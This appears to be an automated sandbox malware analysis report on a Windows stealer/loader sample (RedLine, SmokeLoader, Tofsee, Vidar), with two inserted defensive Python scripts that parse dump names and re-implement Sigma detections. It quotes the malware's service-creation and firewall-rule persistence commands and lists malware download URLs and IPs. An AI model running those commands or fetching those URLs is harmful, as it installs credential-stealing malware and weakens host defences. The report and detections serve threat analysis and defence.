Windows Analysis Report: GNXG5XLBEH.exe

Overview

General Information

Sample Name: GNXG5XLBEH.exe
Analysis ID: 553366
MD5: 6f48e0e76c5dfb3fc3aa45311fa6d0ef
SHA1: 981a29377351493ce6bce4d3aedeec9034dee056
SHA256: 277ac2c203e37dcf3b71748e7de0610ba4bf87ddbb7a19cbe7e6be4cce5ed175
Tags: exe, RedLineStealer

Detection

RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • GNXG5XLBEH.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\GNXG5XLBEH.exe" MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
    • GNXG5XLBEH.exe (PID: 6268 cmdline: "C:\Users\user\Desktop\GNXG5XLBEH.exe" MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 5BBC.exe (PID: 6604 cmdline: C:\Users\user\AppData\Local\Temp\5BBC.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 6B9B.exe (PID: 6156 cmdline: C:\Users\user\AppData\Local\Temp\6B9B.exe MD5: 039CCF44EF7B55AEB4D22D211D17774E)
          • 6B9B.exe (PID: 6568 cmdline: C:\Users\user\AppData\Local\Temp\6B9B.exe MD5: 039CCF44EF7B55AEB4D22D211D17774E)
        • 6BA5.exe (PID: 1412 cmdline: C:\Users\user\AppData\Local\Temp\6BA5.exe MD5: 7E58C9178CBD9D56DB805F034EC795CB)
        • BackgroundTransferHost.exe (PID: 240 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
        • 77CC.exe (PID: 5196 cmdline: C:\Users\user\AppData\Local\Temp\77CC.exe MD5: D8DF1D21042865E2220B0D688BAE6DC4)
          • cmd.exe (PID: 5716 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6480 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5984 cmdline: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2076 cmdline: C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 484 cmdline: "C:\Windows\System32\sc.exe" start ceaplexz MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 4864 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 8058.exe (PID: 5500 cmdline: C:\Users\user\AppData\Local\Temp\8058.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 8058.exe (PID: 5192 cmdline: C:\Users\user\AppData\Local\Temp\8058.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 6632 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6952 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7024 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7088 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7156 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5604 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ttfssdi (PID: 4512 cmdline: C:\Users\user\AppData\Roaming\ttfssdi MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
    • ttfssdi (PID: 1284 cmdline: C:\Users\user\AppData\Roaming\ttfssdi MD5: 6F48E0E76C5DFB3FC3AA45311FA6D0EF)
  • svchost.exe (PID: 6600 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1064 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • evjgtzc.exe (PID: 4876 cmdline: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe" MD5: BBB91EAF2FB4CC1AA911FF4D555EC36D)
    • svchost.exe (PID: 4020 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\6E36.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author
0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0000002E.00000000.418486488.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
(22 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author
23.2.6B9B.exe.6415a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
45.2.svchost.exe.2ee0000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
26.0.6B9B.exe.400000.5.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
30.3.77CC.exe.2190000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
31.2.8058.exe.412f910.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(21 further entries not shown)
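The dump names in the Memory Dumps and Unpacked PEs tables above encode where and under what protection each region was captured. The decoder below is an added example, not sandbox code: it parses both name styles and flags dumps whose protection is PAGE_EXECUTE_READWRITE, since a PE that unpacks over itself must first make its own image writable and executable; the report's "Detected unpacking (overwrites its own PE header)" hit for evjgtzc.exe lines up with the RWX dump at 0x400000 of process index 0x2B. The field layout ('<process index>.<stage>.<dump id>.<base>.<protection>.<type>.sdmp', and '<process index>.<stage>.<image>.<base>.<n>[.raw].unpack') and the reading of stage 0/2/3 as start/end/runtime are inferred from the entries on this page and are assumptions; the PAGE_* values are the Win32 constants; the type field is kept raw because its meaning is not documented here. The input lists are the rows shown on this page (the hidden rows are not included).

```python
"""Decoder for the memory-dump and unpacked-PE names listed in the report,
flagging dumps of PAGE_EXECUTE_READWRITE regions. Added example; the name
layout and stage meanings below are assumptions inferred from the report."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Win32 memory protection constants (low byte; PAGE_GUARD etc. are modifier bits above it)
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
STAGE = {0: "start", 2: "end", 3: "runtime"}  # assumed meaning of the second field

_SDMP = re.compile(r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$", re.I)
_UNPACK = re.compile(r"^(\d+)\.(\d+)\.(.+)\.([0-9a-f]+)\.(\d+)(?:\.raw)?\.unpack$", re.I)


@dataclass
class Dump:
    proc_index: int
    stage: str
    base: int
    protection: str
    type_raw: int
    rule: str
    image: str = "?"


def parse_sdmp(name: str, rule: str) -> Dump:
    """Split a '.sdmp' name into its fields; the process index is hex here."""
    m = _SDMP.match(name)
    if not m:
        raise ValueError(f"not a dump name: {name}")
    idx, stage, _dump_id, base, prot, typ = m.groups()
    prot_val = int(prot, 16)
    return Dump(proc_index=int(idx, 16),
                stage=STAGE.get(int(stage, 16), f"stage{int(stage, 16)}"),
                base=int(base, 16),
                protection=PAGE_PROT.get(prot_val & 0xFF, f"0x{prot_val:x}"),
                type_raw=int(typ, 16),
                rule=rule)


def index_map(unpack_names: List[str]) -> Dict[int, str]:
    """Process index -> image name, learned from the unpacked-PE entries (decimal index)."""
    out: Dict[int, str] = {}
    for n in unpack_names:
        m = _UNPACK.match(n)
        if m:
            out[int(m.group(1))] = m.group(3)
    return out


def rwx_hits(dumps: List[Dump], images: Dict[int, str]) -> List[Dump]:
    """Dumps of RWX regions, with the image name filled in where the index is known."""
    hits = []
    for d in dumps:
        if d.protection == "PAGE_EXECUTE_READWRITE":
            d.image = images.get(d.proc_index, "?")
            hits.append(d)
    return hits


# Constructed input: the rows shown on this page.
REPORT_SDMP = [
    ("0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp", "JoeSecurity_Tofsee"),
    ("0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp", "JoeSecurity_SmokeLoader_2"),
    ("0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp", "JoeSecurity_Tofsee"),
    ("0000002E.00000000.418486488.0000000000402000.00000040.00000001.sdmp", "JoeSecurity_RedLine"),
    ("0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp", "JoeSecurity_Tofsee"),
]
REPORT_UNPACK = [
    "23.2.6B9B.exe.6415a0.1.raw.unpack", "45.2.svchost.exe.2ee0000.0.raw.unpack",
    "26.0.6B9B.exe.400000.5.unpack", "30.3.77CC.exe.2190000.0.raw.unpack",
    "31.2.8058.exe.412f910.1.unpack", "43.2.evjgtzc.exe.400000.0.unpack",
    "28.2.6BA5.exe.7d0e50.1.unpack",
]


def triage() -> List[Dump]:
    dumps = [parse_sdmp(n, r) for n, r in REPORT_SDMP]
    return rwx_hits(dumps, index_map(REPORT_UNPACK))


if __name__ == "__main__":
    for d in triage():
        print(f"proc {d.proc_index:>2} {d.image:<12} {d.stage:<8} base 0x{d.base:08x} {d.protection} [{d.rule}]")
```

Run as a script it lists three RWX dumps: evjgtzc.exe at 0x400000 (its image base, taken at process end), the RedLine dump at 0x402000 in a process whose index is not among the unpacked-PE rows shown, and 77CC.exe at 0x2170000. The RW-only SmokeLoader and Tofsee heap dumps are not reported.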

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe", ParentImage: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe, ParentProcessId: 4876, ProcessCommandLine: svchost.exe, ProcessId: 4020
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentProcessId: 5196, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\, ProcessId: 6480
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe", ParentImage: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe, ParentProcessId: 4876, ProcessCommandLine: svchost.exe, ProcessId: 4020
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentProcessId: 5196, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 4864
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\77CC.exe, ParentProcessId: 5196, ProcessCommandLine: C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5984
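The process tree and the Sigma hits above show the Tofsee persistence chain in one 77CC.exe run: a service whose binary lives in a freshly created SysWOW64 subdirectory and whose arguments point back into %TEMP%, an inbound firewall allow rule for SysWOW64\svchost.exe under a name that imitates a Windows service description, and a bare "svchost.exe" spawned by the service binary rather than by services.exe. The detection logic below is an added example, not Joe Sandbox or Sigma code: it re-implements three of the five hits (New Service Creation, Netsh Port or Application Allowed, the two svchost rules collapsed into one) over process-creation events constructed from the report's process tree, plus a normal BITS host parented by services.exe as a control. ProcEvent, triage and the helper names are this example's own; the event fields mirror the report's Data: lines; the Copying Sensitive Files rule is not reproduced.

```python
"""Three of the report's Sigma hits (New Service Creation, Netsh Port or
Application Allowed, Suspect/Suspicious Svchost) as detection logic over
process-creation events. Added example; events below are constructed from the
report's process tree, and all helper names are this example's own."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    image: str            # the report's Image / NewProcessName
    command_line: str     # CommandLine
    parent_image: str     # ParentImage
    process_id: int
    parent_process_id: int


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def suspect_svchost(ev: ProcEvent) -> bool:
    """A genuine service host is started by services.exe with '-k <group>'.
    Anything else (the report: bare 'svchost.exe' from evjgtzc.exe) is suspect."""
    if _base(ev.image) != "svchost.exe":
        return False
    if _base(ev.parent_image) != "services.exe":
        return True
    return "-k " not in ev.command_line.lower()


def netsh_allow_program(ev: ProcEvent) -> Optional[str]:
    """Program whitelisted by 'netsh advfirewall firewall add rule ... action=allow',
    or None when the event is not such a rule."""
    cl = ev.command_line.lower()
    if _base(ev.image) != "netsh.exe" or "advfirewall" not in cl:
        return None
    if "add rule" not in cl or "action=allow" not in cl:
        return None
    m = re.search(r'program="([^"]+)"|program=(\S+)', ev.command_line, re.I)
    return (m.group(1) or m.group(2)) if m else "<any>"


def sc_created_service(ev: ProcEvent) -> Optional[Tuple[str, str]]:
    """(service name, executable) from 'sc.exe create <name> binPath= <path ...>'.
    The executable is read up to the first whitespace after an optional opening
    quote, which copes with the report's escaped-quote argument but would
    truncate a path containing spaces."""
    if _base(ev.image) != "sc.exe":
        return None
    m = re.search(r'\bcreate\s+(\S+)\s+binPath=\s*"?([^\s"]+)', ev.command_line, re.I)
    return (m.group(1), m.group(2)) if m else None


def triage(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """(rule name, pid, detail) per hit, in event order."""
    findings = []
    for ev in events:
        if suspect_svchost(ev):
            findings.append(("Suspect Svchost Activity", ev.process_id,
                             f"'{ev.command_line}' spawned by {_base(ev.parent_image)} "
                             f"(pid {ev.parent_process_id}), not services.exe"))
        prog = netsh_allow_program(ev)
        if prog is not None:
            detail = f"inbound allow rule for {prog}"
            if _base(prog) == "svchost.exe" and not prog.lower().startswith("c:\\windows\\system32\\"):
                detail += " (svchost.exe outside System32)"
            findings.append(("Netsh Port or Application Allowed", ev.process_id, detail))
        svc = sc_created_service(ev)
        if svc is not None:
            name, exe = svc
            detail = f"service '{name}' -> {exe}"
            if "\\appdata\\local\\temp\\" in ev.command_line.lower():
                detail += "; arguments point back into %TEMP%"
            findings.append(("New Service Creation", ev.process_id, detail))
    return findings


# Constructed from the report's process tree (pids as listed there); the last
# event is a normal BITS service host used as a control and must not fire.
REPORT_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\sc.exe",
              r'C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support',
              r"C:\Users\user\AppData\Local\Temp\77CC.exe", 5984, 5196),
    ProcEvent(r"C:\Windows\SysWOW64\netsh.exe",
              r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul',
              r"C:\Users\user\AppData\Local\Temp\77CC.exe", 4864, 5196),
    ProcEvent(r"C:\Windows\SysWOW64\svchost.exe", "svchost.exe",
              r"C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe", 4020, 4876),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS",
              r"C:\Windows\System32\services.exe", 6632, 700),
]

if __name__ == "__main__":
    for rule, pid, detail in triage(REPORT_EVENTS):
        print(f"[{rule}] pid {pid}: {detail}")
```

Run as a script it prints one finding for each of the three malicious events and nothing for the control. The svchost check keys on parentage and the missing -k group rather than on the image path, because SysWOW64\svchost.exe is a legitimate file and path alone would not separate it from the 32-bit hosts a 64-bit Windows can run.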

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://81.163.30.181/l2.exe; Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php; URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe; Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe; URL Reputation: Label: phishing
Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Avira URL Cloud: Label: malware
Source: http://81.163.30.181/l3.exe; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8058.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Source: C:\Users\user\AppData\Local\Temp\evjgtzc.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\4955.exe; Avira: detection malicious, Label: HEUR/AGEN.1212012
Source: C:\Users\user\AppData\Local\Temp\13C.exe; Avira: detection malicious, Label: HEUR/AGEN.1212012
Multi AV Scanner detection for submitted file
Source: GNXG5XLBEH.exe; Virustotal: Detection: 35%
Multi AV Scanner detection for domain / URL
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe; Virustotal: Detection: 17%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2205.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\2205.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\2D8F.exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\5BBC.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\5BBC.exe; ReversingLabs: Detection: 76%
Machine Learning detection for sample
Source: GNXG5XLBEH.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8058.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ttfssdi; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\74DE.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2205.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5BBC.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\77CC.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\evjgtzc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1523.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6E36.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6B9B.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6471.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\54D0.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2D8F.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 43.2.evjgtzc.exe.600e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 45.2.svchost.exe.2ee0000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 30.3.77CC.exe.2190000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
